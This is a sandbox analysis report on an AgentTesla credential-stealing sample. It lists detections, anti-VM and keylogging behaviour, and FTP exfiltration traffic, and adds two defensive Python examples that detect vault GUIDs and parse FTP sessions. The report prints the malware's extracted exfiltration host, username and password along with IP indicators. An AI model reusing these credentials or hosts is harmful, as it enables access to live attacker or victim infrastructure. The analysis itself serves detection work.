
Windows Analysis Report
pE7icjUisS.exe

Overview

General Information

Sample name: pE7icjUisS.exe (renamed because the original name is a hash value)
Original sample name: fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc.exe
Analysis ID: 1567461
MD5: 95c864e4a99b56f70fe18081066ed7b3
SHA1: a8112f75b9869798c6e15782cd651690f1b6faf8
SHA256: fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc
Tags: AgentTesla, exe, user-adrian__luca

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pE7icjUisS.exe (PID: 996 cmdline: "C:\Users\user\Desktop\pE7icjUisS.exe" MD5: 95C864E4A99B56F70FE18081066ED7B3)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
Yara matches: submitted sample

Source: pE7icjUisS.exe
  • JoeSecurity_CredentialStealer (Joe Security): Yara detected Credential Stealer
  • JoeSecurity_AgentTesla_1 (Joe Security): Yara detected AgentTesla
  • INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (ditekSHen): Detects executables referencing Windows vault credential objects. Observed in infostealers
      0x3302b: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      0x3309d: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      0x33127: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      0x331b9: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      0x33223: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      0x33295: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      0x3332b: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      0x333bb: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
    These are the schema GUIDs of the Windows Credential Manager vault (4BF4C442-9B8A-41A0-B380-DD4A704DDB28 is the Web Credentials schema, 77BC582B-F0A6-4E15-4E80-61736B6F3B29 is Windows Credentials); referencing all eight fits the load of vaultcli.dll listed under System Summary and points at vault enumeration rather than a single stored credential.
  • MALWARE_Win_AgentTeslaV2 (ditekSHen): AgentTesla Type 2 Keylogger payload
      0x304ae: $s2: GetPrivateProfileString
      0x2fb58: $s3: get_OSFullName
      0x311ea: $s5: remove_Key
      0x3138f: $s5: remove_Key
      0x32258: $s6: FtpWebRequest
      0x3300d: $s7: logins
      0x3357f: $s7: logins
      0x36290: $s7: logins
      0x36342: $s7: logins
      0x37c3e: $s7: logins
      0x36edc: $s9: 1.85 (Hash, version 2, native byte-order)

Yara matches: network capture

Source: dump.pcap
  • JoeSecurity_AgentTesla_1 (Joe Security): Yara detected AgentTesla

Yara matches: memory dumps

Source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp
  • JoeSecurity_AgentTesla_1 (Joe Security): Yara detected AgentTesla
Source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp
  • JoeSecurity_CredentialStealer (Joe Security): Yara detected Credential Stealer
  • JoeSecurity_AgentTesla_1 (Joe Security): Yara detected AgentTesla
Source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp
  • JoeSecurity_CredentialStealer (Joe Security): Yara detected Credential Stealer
  • JoeSecurity_AgentTesla_1 (Joe Security): Yara detected AgentTesla
(2 further memory-dump matches are not included in this excerpt)
Yara matches: unpacked PE

Source: 0.0.pE7icjUisS.exe.b30000.0.unpack
  • JoeSecurity_CredentialStealer (Joe Security): Yara detected Credential Stealer
  • JoeSecurity_AgentTesla_1 (Joe Security): Yara detected AgentTesla
  • INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (ditekSHen): Detects executables referencing Windows vault credential objects. Observed in infostealers
      0x3302b: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      0x3309d: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      0x33127: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      0x331b9: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      0x33223: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      0x33295: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      0x3332b: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      0x333bb: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
  • MALWARE_Win_AgentTeslaV2 (ditekSHen): AgentTesla Type 2 Keylogger payload
      0x304ae: $s2: GetPrivateProfileString
      0x2fb58: $s3: get_OSFullName
      0x311ea: $s5: remove_Key
      0x3138f: $s5: remove_Key
      0x32258: $s6: FtpWebRequest
      0x3300d: $s7: logins
      0x3357f: $s7: logins
      0x36290: $s7: logins
      0x36342: $s7: logins
      0x37c3e: $s7: logins
      0x36edc: $s9: 1.85 (Hash, version 2, native byte-order)
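The eight GUIDs matched by INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID are worth being able to find without the full rule set, and a scanner that only looks for ASCII misses them in a .NET binary, because managed string literals are stored as UTF-16LE in the #US heap (the 0x72-byte spacing between the hits above is the 72 bytes of a wide GUID plus surrounding text). The following is an added example written for this page, not code from the Joe Sandbox report, from the rule author or from the sample. The GUID list is copied from the rule hits above; the schema names are the Credential Manager vault schemas those GUIDs identify; the byte blob it scans is constructed here so it runs offline, and the "two or more distinct schemas" verdict threshold is this example's choice, not the rule's condition.

```python
"""Encoding-aware scan for Windows Credential Manager vault schema GUIDs.

Added example for this page; not part of the Joe Sandbox report or of the
ditekSHen rule. The GUID list comes from the rule hits in the report, the
sample blob is constructed, and the verdict threshold is this example's.
"""
import sys
from typing import Dict, List, Tuple

# GUID -> Credential Manager vault schema it identifies.
VAULT_SCHEMAS: Dict[str, str] = {
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5": "Windows Secure Note",
    "3CCD5499-87A8-4B10-A215-608888DD3B55": "Windows Web Password Credential",
    "154E23D0-C644-4E6F-8CE6-5069272F999F": "Windows Credential Picker Protector",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28": "Web Credentials",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29": "Windows Credentials",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC": "Windows Domain Certificate Credential",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B": "Windows Domain Password Credential",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548": "Windows Extended Credential",
}

Hit = Tuple[int, str, str]  # (offset, guid, "ascii" | "wide")


def find_vault_guids(data: bytes) -> List[Hit]:
    """Locate every schema GUID in `data`, upper- or lower-case, stored as
    ASCII or as UTF-16LE ("wide"). .NET string literals live in the #US heap
    as UTF-16LE, so an ASCII-only search misses a managed stealer entirely."""
    hits: List[Hit] = []
    for guid in VAULT_SCHEMAS:
        for variant in (guid.upper(), guid.lower()):
            for enc, label in (("ascii", "ascii"), ("utf-16-le", "wide")):
                needle = variant.encode(enc)
                pos = data.find(needle)
                while pos != -1:
                    hits.append((pos, guid, label))
                    pos = data.find(needle, pos + 1)
    return sorted(set(hits))


def vault_verdict(data: bytes, min_distinct: int = 2) -> Dict[str, object]:
    """Summarise the hits. `min_distinct` is this example's threshold: one GUID
    can occur in legitimate credential-management code, several together is
    the infostealer pattern the rule description refers to."""
    hits = find_vault_guids(data)
    distinct = sorted({guid for _, guid, _ in hits})
    return {
        "hits": len(hits),
        "distinct_guids": len(distinct),
        "schemas": [VAULT_SCHEMAS[g] for g in distinct],
        "wide_only": bool(hits) and all(label == "wide" for _, _, label in hits),
        "suspicious": len(distinct) >= min_distinct,
    }


def build_sample() -> bytes:
    """Constructed stand-in for a .NET image (not the real sample): an MZ
    header, padding, two GUIDs stored as UTF-16LE (one lower-case, as
    compilers often emit them) and one stored as ASCII."""
    blob = bytearray(b"MZ" + b"\x00" * 0x1000)
    blob += "4BF4C442-9B8A-41A0-B380-DD4A704DDB28".encode("utf-16-le")          # at 0x1002
    blob += b"\x00" * 0x40
    blob += "77BC582B-F0A6-4E15-4E80-61736B6F3B29".lower().encode("utf-16-le")  # at 0x108A
    blob += b"\x00" * 0x40
    blob += b"2F1A6504-0641-44CF-8BB5-3612D865F2E5"                              # at 0x1112
    blob += b"\x00" * 0x100
    return bytes(blob)


if __name__ == "__main__":
    # Scan a file named on the command line, or the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for offset, guid, label in find_vault_guids(data):
        print(f"0x{offset:x}  {label:5}  {guid}  ({VAULT_SCHEMAS[guid]})")
    print(vault_verdict(data))
```

Run it against the unpacked image (`0.0.pE7icjUisS.exe.b30000.0.unpack` in the report's terms) and the offsets should line up with the rule's string hits; on a packed or encrypted first stage it finds nothing, which is exactly why the report also scans the unpacked PE and the memory dumps.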
No Sigma rule has matched.

Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                      Source             Destination           Protocol
2024-12-03T15:57:16.502872+0100  2029927  1         A Network Trojan was detected  192.168.2.7:49711  104.247.165.99:21     TCP
2024-12-03T15:57:17.679216+0100  2855542  1         A Network Trojan was detected  192.168.2.7:49720  104.247.165.99:51146  TCP
2024-12-03T15:57:17.800328+0100  2855542  1         A Network Trojan was detected  192.168.2.7:49720  104.247.165.99:51146  TCP


                      AV Detection

Source: pE7icjUisS.exe | Avira: detected
Source: http://ftp.normagroup.com.tr | Avira URL Cloud: Label: phishing
Source: pE7icjUisS.exe | Malware Configuration Extractor: AgentTesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
Source: pE7icjUisS.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: pE7icjUisS.exe | Joe Sandbox ML: detected
Source: pE7icjUisS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: pE7icjUisS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49720 -> 104.247.165.99:51146
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49711 -> 104.247.165.99:21
Source: global traffic | TCP traffic: 192.168.2.7:49720 -> 104.247.165.99:51146
Source: Joe Sandbox View | IP Address: 104.247.165.99
Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS
Source: unknown | FTP traffic detected: 104.247.165.99:21 -> 192.168.2.7:49711, server greeting:
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 4 of 50 allowed.
    220-Local time is now 17:57. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ftp.normagroup.com.tr
Source: pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.normagroup.com.tr
Source: pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pE7icjUisS.exe | String found in binary or memory: https://account.dyn.com/
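The network section shows three things an analyst wants to connect: a plaintext FTP control session on port 21 (the 220 greeting was readable in the capture, so the connection did not start with implicit TLS), a second connection to the high port 51146 that Suricata tagged as exfiltration, and the FTP credentials recovered by the configuration extractor. The following is an added example written for this page, not code from the Joe Sandbox report or from the sample; it parses an FTP control channel and derives the data endpoint from the 227 passive-mode reply, which is the usual reason a high, non-standard port follows a port-21 session. Only the six 220 greeting lines in the transcript are from the report. Every other line is constructed: the 227 reply is written so that it decodes to 51146 to match the port seen above (the report excerpt does not show a PASV exchange, so this is an assumption), the transcript assumes no AUTH TLS was issued, and the password and upload name are placeholders rather than the extracted credential or a real file name.

```python
"""Parse an FTP control channel: login, passive-mode data endpoint, uploads,
and whether credentials crossed the wire in the clear.

Added example for this page; not part of the Joe Sandbox report. The 220
greeting lines are the ones captured in the report; all other transcript
lines are constructed (the 227 reply is chosen to yield port 51146).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# RFC 959 passive reply: 227 ... (h1,h2,h3,h4,p1,p2); data port = p1*256 + p2
PASV_RE = re.compile(
    r"^227\D*\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)

# Constructed transcript as ("C" client | "S" server, line). Only the 220 lines
# are from the report; password and file name are placeholders.
SAMPLE_TRANSCRIPT: List[Tuple[str, str]] = [
    ("S", "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------"),
    ("S", "220-You are user number 4 of 50 allowed."),
    ("S", "220-Local time is now 17:57. Server port: 21."),
    ("S", "220-This is a private system - No anonymous login"),
    ("S", "220-IPv6 connections are also welcome on this server."),
    ("S", "220 You will be disconnected after 15 minutes of inactivity."),
    ("C", "USER admins@normagroup.com.tr"),
    ("S", "331 User admins@normagroup.com.tr OK. Password required"),
    ("C", "PASS example-password"),                                # placeholder
    ("S", "230 OK. Current directory is /"),
    ("C", "TYPE I"),
    ("S", "200 TYPE is now 8-bit binary"),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (104,247,165,99,199,202)"),   # 199*256+202 = 51146
    ("C", "STOR exfil_example.html"),                              # placeholder
    ("S", "150 Accepted data connection"),
    ("S", "226 File successfully transferred"),
    ("C", "QUIT"),
    ("S", "221 Goodbye."),
]


@dataclass
class FtpSession:
    banner: List[str] = field(default_factory=list)
    user: Optional[str] = None
    password_sent: bool = False          # recorded as a fact, the secret is never kept
    tls_offered: bool = False            # server advertised TLS in its greeting
    tls_negotiated: bool = False         # client issued AUTH TLS and got a 234 reply
    data_endpoints: List[Tuple[str, int]] = field(default_factory=list)
    uploads: List[str] = field(default_factory=list)


def pasv_endpoint(reply: str) -> Optional[Tuple[str, int]]:
    """Decode a 227 reply into (ip, port); None for any other line."""
    m = PASV_RE.match(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(g) for g in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def parse_control_channel(lines: Iterable[Tuple[str, str]]) -> FtpSession:
    s = FtpSession()
    for direction, text in lines:
        if direction == "S":
            if text.startswith("220"):
                s.banner.append(text)
                s.tls_offered = s.tls_offered or "[TLS]" in text
            elif text.startswith("227"):
                ep = pasv_endpoint(text)
                if ep:
                    s.data_endpoints.append(ep)
            elif text.startswith("234"):
                s.tls_negotiated = True
        else:
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s.user = arg
            elif verb == "PASS":
                s.password_sent = True
            elif verb in ("STOR", "APPE"):
                s.uploads.append(arg)
    return s


def triage(s: FtpSession) -> Dict[str, object]:
    """The flags an analyst wants next to the Suricata alerts."""
    return {
        "login": s.user,
        "cleartext_credentials": s.password_sent and not s.tls_negotiated,
        "tls_offered_but_unused": s.tls_offered and not s.tls_negotiated,
        "expected_data_ports": sorted({port for _, port in s.data_endpoints}),
        "uploads": list(s.uploads),
    }


if __name__ == "__main__":
    for key, value in triage(parse_control_channel(SAMPLE_TRANSCRIPT)).items():
        print(f"{key}: {value}")
```

The `expected_data_ports` value is what to compare against the "non-standard port" finding: if the high-port connection matches a 227 reply on the control channel, it is the FTP data transfer carrying the stolen data, not a second protocol. The `cleartext_credentials` flag is also the defender's opportunity: a server that advertises TLS but receives USER and PASS unencrypted leaves the exfiltration account visible to anyone holding the capture.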

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: pE7icjUisS.exe, oAKy.cs | .Net Code: _5754M2
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Windows user hook set: keyboard low level (WH_KEYBOARD_LL), thread id 0 (all threads, i.e. a global hook), hook module C:\Users\user\Desktop\pE7icjUisS.exe
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary

Source: pE7icjUisS.exe, type: SAMPLE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: pE7icjUisS.exe, type: SAMPLE | Matched rule: AgentTesla Type 2 Keylogger payload. Author: ditekSHen
Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTesla Type 2 Keylogger payload. Author: ditekSHen
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_014D4A60
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_014D3E48
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_014DD1FB
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_014D4190
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_062656C0
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_06263F30
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_0626DC00
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_0626BCD8
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_06268D1F
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_06262AF8
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_06260040
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_06264FE0
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_0626321F
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_063AF0B8
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_063A1128
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_063A1122
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_014DB78A
Source: pE7icjUisS.exe, 00000000.00000002.3855637535.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename clr.dll vs pE7icjUisS.exe
Source: pE7icjUisS.exe, 00000000.00000002.3855523364.0000000000EF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilename UNKNOWN_FILE vs pE7icjUisS.exe
Source: pE7icjUisS.exe, 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename f7121708-72dc-44f1-ae95-b037bc906047.exe vs pE7icjUisS.exe
Source: pE7icjUisS.exe | Binary or memory string: OriginalFilename f7121708-72dc-44f1-ae95-b037bc906047.exe vs pE7icjUisS.exe
Source: pE7icjUisS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: pE7icjUisS.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: pE7icjUisS.exe, type: SAMPLE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgentTesla Type 2 Keylogger payload
Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgentTesla Type 2 Keylogger payload
Source: pE7icjUisS.exe, ekKu0.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: pE7icjUisS.exe, vKf1z6NvS.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: pE7icjUisS.exe, ZNAvlD7qmXc.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: pE7icjUisS.exe, U2doU2.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: pE7icjUisS.exe, BgffYko.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: pE7icjUisS.exe, HrTdA63.cs | Cryptographic APIs: 'CreateDecryptor'
Source: pE7icjUisS.exe, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock' (4 call sites)
Source: pE7icjUisS.exe | Binary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Mutant created: NULL
Source: pE7icjUisS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pE7icjUisS.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\pE7icjUisS.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\pE7icjUisS.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\pE7icjUisS.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: pE7icjUisS.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: ucrtbase_clr0400.dll (loaded twice)
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: pE7icjUisS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: pE7icjUisS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Code function: 0_2_06263AAF push ebx; retf (0_2_06263ADA)
Source: C:\Users\user\Desktop\pE7icjUisS.exe | Process information set: NOOPENFILEERRORBOX (57 occurrences)

                      Malware Analysis System Evasion

                      barindex
Source: C:\Users\user\Desktop\pE7icjUisS.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Memory allocated: 14D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Memory allocated: 2E50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Memory allocated: 4E50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1200000
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199871
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199762
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199656
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199463
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199348
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199218
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199109
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1199000
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198890
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198781
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198672
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198562
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198453
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198342
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198234
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1198122
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197998
